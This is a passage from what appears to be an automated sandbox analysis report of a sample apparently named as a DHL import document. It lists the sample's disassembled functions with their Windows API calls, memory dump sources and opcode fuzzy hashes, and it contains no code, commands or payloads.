                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID:
                                                                                          • API String ID: 3850602802-0
                                                                                          • Opcode ID: 30ea592a5ee0f8d6ab4377f754107a586f9d068c29c240425699f1b1664aa28e
                                                                                          • Instruction ID: 9e9d33f2ee72939b6b21435bb58b11e84ba463635d8f54a7b20c14a843af33c2
                                                                                          • Opcode Fuzzy Hash: 30ea592a5ee0f8d6ab4377f754107a586f9d068c29c240425699f1b1664aa28e
                                                                                          • Instruction Fuzzy Hash: 5A11F73A901229FFEF119BA5C985FADBB78FB48750F200095EA04B7290D7716E50DB94
                                                                                          Function 0083E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0083E1FD
                                                                                          • MessageBoxW.USER32(?,?,?,?), ref: 0083E230
                                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0083E246
                                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0083E24D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                          • String ID:
                                                                                          • API String ID: 2880819207-0
                                                                                          • Opcode ID: 7e5f3e220404211285d2110458722b21481532f2d7f9a23a5d34ecf02b9e3785
                                                                                          • Instruction ID: 2262c6a9ef162b6185d0b7d42ade6d22d4e335f4ca38869f8d7e2c54c88b18ee
                                                                                          • Opcode Fuzzy Hash: 7e5f3e220404211285d2110458722b21481532f2d7f9a23a5d34ecf02b9e3785
                                                                                          • Instruction Fuzzy Hash: 7611C476904258BBDB119FA89C09EAF7FADFB86320F044255F924E33D1D7B89D0487A0
                                                                                          Function 007FD1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateThread.KERNEL32(00000000,?,007FCFF9,00000000,00000004,00000000), ref: 007FD218
                                                                                          • GetLastError.KERNEL32 ref: 007FD224
                                                                                          • __dosmaperr.LIBCMT ref: 007FD22B
                                                                                          • ResumeThread.KERNEL32(00000000), ref: 007FD249
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                                          • String ID:
                                                                                          • API String ID: 173952441-0
                                                                                          • Opcode ID: f9438cd9ab66916ef050a441c479964a7007a9034963d139d8c8790d90ac6daa
                                                                                          • Instruction ID: 1ca9d2233a75bd0dd8a267b452ac5fb4d6bd928b127e70b03804d6f98ad54035
                                                                                          • Opcode Fuzzy Hash: f9438cd9ab66916ef050a441c479964a7007a9034963d139d8c8790d90ac6daa
                                                                                          • Instruction Fuzzy Hash: 8E01D63640510CBBDB215BA5DC09BBE7A6AFF82331F110219FA25923D0DFB58D01C6E1
                                                                                          Function 007D600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007D604C
                                                                                          • GetStockObject.GDI32(00000011), ref: 007D6060
                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 007D606A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateMessageObjectSendStockWindow
                                                                                          • String ID:
                                                                                          • API String ID: 3970641297-0
                                                                                          • Opcode ID: d212082c0cabc34cee6a73d21fe2110482f67bf401e5e0082887d6a546c408eb
                                                                                          • Instruction ID: 602d00ce11af304d6f3ac957f1c917d410eaf2c676476216253dd05f0e5004a9
                                                                                          • Opcode Fuzzy Hash: d212082c0cabc34cee6a73d21fe2110482f67bf401e5e0082887d6a546c408eb
                                                                                          • Instruction Fuzzy Hash: 6A118B72101508BFEF125FA48C44EFABBB9FF093A4F050206FA5492220C77ADC60DBA0
                                                                                          Function 007F3B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ___BuildCatchObject.LIBVCRUNTIME ref: 007F3B56
                                                                                            • Part of subcall function 007F3AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 007F3AD2
                                                                                            • Part of subcall function 007F3AA3: ___AdjustPointer.LIBCMT ref: 007F3AED
                                                                                          • _UnwindNestedFrames.LIBCMT ref: 007F3B6B
                                                                                          • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 007F3B7C
                                                                                          • CallCatchBlock.LIBVCRUNTIME ref: 007F3BA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                          • String ID:
                                                                                          • API String ID: 737400349-0
                                                                                          • Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                          • Instruction ID: 62ae64ccda0551963fe7d075a4ba836fce59d507fc53f44aace9705b718cd984
                                                                                          • Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
                                                                                          • Instruction Fuzzy Hash: 9801177210014DFBDF125E95CC46EFB3B6AEF88754F044015FE4866221C63AE961ABA0
                                                                                          Function 00803073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,007D13C6,00000000,00000000,?,0080301A,007D13C6,00000000,00000000,00000000,?,0080328B,00000006,FlsSetValue), ref: 008030A5
                                                                                          • GetLastError.KERNEL32(?,0080301A,007D13C6,00000000,00000000,00000000,?,0080328B,00000006,FlsSetValue,00872290,FlsSetValue,00000000,00000364,?,00802E46), ref: 008030B1
                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0080301A,007D13C6,00000000,00000000,00000000,?,0080328B,00000006,FlsSetValue,00872290,FlsSetValue,00000000), ref: 008030BF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 3177248105-0
                                                                                          • Opcode ID: 1964731a7f4da816d4cd53c05c40c9f96ea24405054223f1e3fb4aaee2d3d47b
                                                                                          • Instruction ID: b33ed5323d253ebdc96ee5af52bd259152b49090ae17f5f86860685c6d3205a3
                                                                                          • Opcode Fuzzy Hash: 1964731a7f4da816d4cd53c05c40c9f96ea24405054223f1e3fb4aaee2d3d47b
                                                                                          • Instruction Fuzzy Hash: 19012B32313A26ABCB714B799C449677B9CFF46B61B214620F945E32C0D721D901C6E0
                                                                                          Function 00837464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0083747F
                                                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00837497
                                                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008374AC
                                                                                          • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008374CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Type$Register$FileLoadModuleNameUser
                                                                                          • String ID:
                                                                                          • API String ID: 1352324309-0
                                                                                          • Opcode ID: eb7eaa7a4eff71300c67d797c5d01cf383969751d300e55d24ba81490c0504f2
                                                                                          • Instruction ID: 485e6b684b14830ef413acc79e38a4d120b6ddfe4d680c2c6aac2817cf33810a
                                                                                          • Opcode Fuzzy Hash: eb7eaa7a4eff71300c67d797c5d01cf383969751d300e55d24ba81490c0504f2
                                                                                          • Instruction Fuzzy Hash: 041179B1209315ABE7308F54EC09BA27BF8FB80B04F108569E696D6191DBB0F944DBA4
                                                                                          Function 0083B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0083ACD3,?,00008000), ref: 0083B0C4
                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0083ACD3,?,00008000), ref: 0083B0E9
                                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0083ACD3,?,00008000), ref: 0083B0F3
                                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0083ACD3,?,00008000), ref: 0083B126
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CounterPerformanceQuerySleep
                                                                                          • String ID:
                                                                                          • API String ID: 2875609808-0
                                                                                          • Opcode ID: b5ad3baed525cb93d4b126547ab71732cef7fc33c56c7875c7ffd76657af92f4
                                                                                          • Instruction ID: 1244fbba461f107bc9520996e558057e7f275c6a804e3b271e9b3bef8ff5d928
                                                                                          • Opcode Fuzzy Hash: b5ad3baed525cb93d4b126547ab71732cef7fc33c56c7875c7ffd76657af92f4
                                                                                          • Instruction Fuzzy Hash: E3115B71C0192DE7CF04AFE4E9686FEBF78FF8A711F114086DA81B6185DB7096508BA1
                                                                                          Function 00832DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00832DC5
                                                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 00832DD6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00832DDD
                                                                                          • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00832DE4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2710830443-0
                                                                                          • Opcode ID: 6a00443b2a12d3008b83661282143fa647b6b120687ba9e81443306cd4784127
                                                                                          • Instruction ID: 6358158dccf0bf912deb88bf5583b026e033f2c3b8296966b4c28772a7c476d9
                                                                                          • Opcode Fuzzy Hash: 6a00443b2a12d3008b83661282143fa647b6b120687ba9e81443306cd4784127
                                                                                          • Instruction Fuzzy Hash: 6FE0EDB15012287ADB202B63DC0DEFB7E6CFF96BA1F411119F606D50909AE58941C6F1
                                                                                          Function 00868863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007E9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 007E9693
                                                                                            • Part of subcall function 007E9639: SelectObject.GDI32(?,00000000), ref: 007E96A2
                                                                                            • Part of subcall function 007E9639: BeginPath.GDI32(?), ref: 007E96B9
                                                                                            • Part of subcall function 007E9639: SelectObject.GDI32(?,00000000), ref: 007E96E2
                                                                                          • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 00868887
                                                                                          • LineTo.GDI32(?,?,?), ref: 00868894
                                                                                          • EndPath.GDI32(?), ref: 008688A4
                                                                                          • StrokePath.GDI32(?), ref: 008688B2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                          • String ID:
                                                                                          • API String ID: 1539411459-0
                                                                                          • Opcode ID: 4cdd14234fbf8ae8020a3316147874b2018ea6e074f8619edd95772aecffe1fe
                                                                                          • Instruction ID: 550ab377f6be6abc314e7a68d54c9884139c2b60fe872c64f1d36b43c6f8fa39
                                                                                          • Opcode Fuzzy Hash: 4cdd14234fbf8ae8020a3316147874b2018ea6e074f8619edd95772aecffe1fe
                                                                                          • Instruction Fuzzy Hash: FBF05E36041658FAEB126F94AC0DFDE3F59BF0A310F458100FA51650E1C7B55511CFE6
                                                                                          Function 007E98B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSysColor.USER32(00000008), ref: 007E98CC
                                                                                          • SetTextColor.GDI32(?,?), ref: 007E98D6
                                                                                          • SetBkMode.GDI32(?,00000001), ref: 007E98E9
                                                                                          • GetStockObject.GDI32(00000005), ref: 007E98F1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Color$ModeObjectStockText
                                                                                          • String ID:
                                                                                          • API String ID: 4037423528-0
                                                                                          • Opcode ID: 8c8689689ffd47efbbd7387e0e4bacc5a9f80d9879859652544928f110fddfa0
                                                                                          • Instruction ID: 28330a2e887e8002f0d53350d36840ca8fd3839cb726e8ebaa27448d89e571cb
                                                                                          • Opcode Fuzzy Hash: 8c8689689ffd47efbbd7387e0e4bacc5a9f80d9879859652544928f110fddfa0
                                                                                          • Instruction Fuzzy Hash: 49E06531244280AADB215B75BC09BE93F10FB12335F049219F7FA940E1C3B146909B11
                                                                                          Function 0083162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThread.KERNEL32 ref: 00831634
                                                                                          • OpenThreadToken.ADVAPI32(00000000,?,?,?,008311D9), ref: 0083163B
                                                                                          • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008311D9), ref: 00831648
                                                                                          • OpenProcessToken.ADVAPI32(00000000,?,?,?,008311D9), ref: 0083164F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentOpenProcessThreadToken
                                                                                          • String ID:
                                                                                          • API String ID: 3974789173-0
                                                                                          • Opcode ID: a425c0f5fb413d50a3ffc3545dedf0f470c1642f74d87d7f0970919c48b50573
                                                                                          • Instruction ID: b04ce99bceaf17e644b35d0537c27a80a6481e34e57deca1e26f5c5807369d3f
                                                                                          • Opcode Fuzzy Hash: a425c0f5fb413d50a3ffc3545dedf0f470c1642f74d87d7f0970919c48b50573
                                                                                          • Instruction Fuzzy Hash: A4E08631601211EBDB201FE19E0DB663B7CFF54B91F154808F685C9080E6B44440C791
                                                                                          Function 0082D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDesktopWindow.USER32 ref: 0082D858
                                                                                          • GetDC.USER32(00000000), ref: 0082D862
                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0082D882
                                                                                          • ReleaseDC.USER32(?), ref: 0082D8A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2889604237-0
                                                                                          • Opcode ID: 132bbd21652f75d7b17a97c768b3e2ccf2b38f44e63b8be09a2c0a41562a31dc
                                                                                          • Instruction ID: a8e9d1b1049e2d5af689cf9c72c37da41134e1138800d635e330d2074dd93301
                                                                                          • Opcode Fuzzy Hash: 132bbd21652f75d7b17a97c768b3e2ccf2b38f44e63b8be09a2c0a41562a31dc
                                                                                          • Instruction Fuzzy Hash: 3CE01AB5800205EFCB419FA0D90C67DBBB1FB18310F15A419E88AE7250CBB85941AF44
                                                                                          Function 0082D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDesktopWindow.USER32 ref: 0082D86C
                                                                                          • GetDC.USER32(00000000), ref: 0082D876
                                                                                          • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0082D882
                                                                                          • ReleaseDC.USER32(?), ref: 0082D8A3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CapsDesktopDeviceReleaseWindow
                                                                                          • String ID:
                                                                                          • API String ID: 2889604237-0
                                                                                          • Opcode ID: 6fc9d90746662ba32165cf07b6c12c4045833e7b57f879b4374ec81b0da75209
                                                                                          • Instruction ID: 8d0d26d0340bec5e49213b63a968d82e2e9ad013e9c90e12d5babcd265970d9f
                                                                                          • Opcode Fuzzy Hash: 6fc9d90746662ba32165cf07b6c12c4045833e7b57f879b4374ec81b0da75209
                                                                                          • Instruction Fuzzy Hash: 2EE012B1800200EFCB51AFA0D80C66DBBB1FB18310B15A009E88AE7250CBB85901AF44
                                                                                          Function 00844D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D7620: _wcslen.LIBCMT ref: 007D7625
                                                                                          • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00844ED4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Connection_wcslen
                                                                                          • String ID: *$LPT
                                                                                          • API String ID: 1725874428-3443410124
                                                                                          • Opcode ID: 8bbe2883efcb73563a5711b6ef148e6edbc743e96c20e77d6bb4430996d2ad08
                                                                                          • Instruction ID: 1fbea1fc4de1de82dad58c2c4391e243b5f0601b1e677a426f84ac3e1e1858f8
                                                                                          • Opcode Fuzzy Hash: 8bbe2883efcb73563a5711b6ef148e6edbc743e96c20e77d6bb4430996d2ad08
                                                                                          • Instruction Fuzzy Hash: 98913D75A00208DFDB14DF58C484EA9BBF1FF44318F199099E80A9B362DB75ED85CB91
